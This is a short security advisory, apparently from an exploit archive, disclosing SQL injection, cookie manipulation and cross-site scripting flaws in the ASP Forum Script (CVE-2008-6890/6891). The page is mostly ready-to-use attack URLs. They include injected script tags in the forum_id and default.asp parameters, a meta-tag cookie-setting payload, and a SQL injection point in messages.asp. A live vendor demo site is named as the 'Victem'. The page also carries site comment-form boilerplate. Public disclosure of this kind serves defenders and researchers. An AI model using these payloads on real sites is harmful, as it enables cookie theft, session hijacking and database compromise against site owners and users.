ASP Forum Script CM,XSS,SQL

2009-08-04 / 2009-08-05

Credit: Pouya_Server

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6890 | CVE-2008-6891

CWE: CWE-89

#########################################################
---------------------------------------------------------
Portal Name: ASP Forum Script
Vendor : http://codetoad.com/demos/forum/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]
1=1

[Cookie Manipulation]:
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>

[XSS]:
http://site.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<script>alert(1369)</script
>
http://site.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
---------------------------------

Victem :
http://codetoad.com/demos/forum

References:

http://xforce.iss.net/xforce/xfdb/47000

http://www.securityfocus.com/bid/32571

http://packetstormsecurity.org/0812-exploits/aspforum-cmsqlxss.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ASP Forum Script CM,XSS,SQL

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.